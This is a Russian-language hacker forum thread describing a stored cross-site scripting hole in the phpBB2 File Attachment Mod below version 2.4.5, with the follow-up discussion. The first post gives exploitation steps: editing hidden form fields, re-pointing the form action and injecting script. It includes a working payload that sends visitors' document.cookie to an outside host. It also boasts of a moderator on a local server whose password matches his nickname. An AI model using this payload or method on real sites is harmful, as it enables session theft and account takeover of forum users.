![]() |
!!! phpBB2 mod File Attachment Mode новая активная XSS !!!
Приношу свои извинения но как выяснилось эта уязвимость не в движке форума а только в его модуле File Attachment Mode версия ниже 2.4.5
привет всем...рассказываю о xss уязвимости найденной мною 14.04.2008 )))) исходя из сообщения Basurman : Цитата:
уязвимый скрипт: posting_attachments.php (в него передается из posting.php (судя по ошибке вызываемой пунктом 5 ниже)) Уязвимые поля:
суть уязвимости: при прикреплении файла к сообщению появляется блок срытых полей (hidden), при отправке сообщения не обрабатывается скрытое поле filename_list[], и остальные указанные выше, в котором отображается имя прикрепленого файла. Сохраняем страницу на комп... редактируем изменяя параметр type у указанных выше полей на text, и изменяем и изменяем action формы на полный путь типа http://сайт/ди/ри/ктория/posting.php , сохраняем и открываем в браузере. видим что появилось(ись) текстовые поля дописываем в них HTML или JavaScript или VBScript и т.п. в зависимости от вашей цели затем отправляем и и наслаждаемся (можно вписать такой код: <script>img=new Image();img.src="http://s.netsec.ru/xx.gif?"+document.cookie;</script> и ждать пока тебе придут cookie :)) все тоже самое с перечисленными выше скриптами... на 3-й ветке пробовал там уже нету..... :cool: Video: http://xakep-ru.pochta.ru/phpBB_xss_by_KIR_PRO.rar1644 Кб :D + если кто то найдет sql как можно использовать ошибку из 5 пункта напишите мне в ЛС я добавлю рядом с 5 пунктом ссылку на твою тему ;) ___________________________________ http://www.hash.ixces.ru/img.gif не могу найти где подпись делать.... может я ударился головой? напишите если кто знает как подпись делать... |
Ммм... Ты думаешь, жертва сама сохранит страницу и исправит сурс, потом зайдет обратно на форум, чтобы сама себе alert'ы писать типа "ПРЕВЕД"?
|
Basurman яж написал АКТИВНАЯ XSS жертве ниче делать не надо....
ты редактируешь страницу... вписываешь в скрытые поля xss и отправляешь... у всех кто читает тему будет выполнятся код.... |
Это вопрос был :)
И еще: В phpBB по умолчанию кидать на форум файлы нельзя. Это делается отдельным модом. Судя по видео - File Attachment Mode... Какая там версия стоит? Последняя 2.4.5 |
Basurman честно скажу не знаю.... админы постарались как можно сильнее всю инфу о версиях спрятать...
а ты умерен что это мод File Attachment Mode и что это вообще мод я просто с phpBB вообще впервые столкнулся подруку попался.... у нас в локалке такой на сервере стоит.... и оказалось что у одного из модеров пароль такойже как ник))))) |
Цитата:
|
на 2.4.5 не пашет
код посмотрю еще... http://www.securitylab.ru/vulnerability/273545.php |
тогда будем считать что я нашел как юзать указанную в http://www.securitylab.ru/vulnerability/273545.php уязвимость )))))))) т.к. там не указано в каких параметрах и как юзать))))
bobob а ты к примеру знал как её юзать??? тока честно..... я вот ни где не нашел.... |
Видео к уязвимости: http://video.antichat.ru/file264.html
|
ShadOS, http://www.securitylab.ru/vulnerability/273545.php
|
| Время: 01:04 |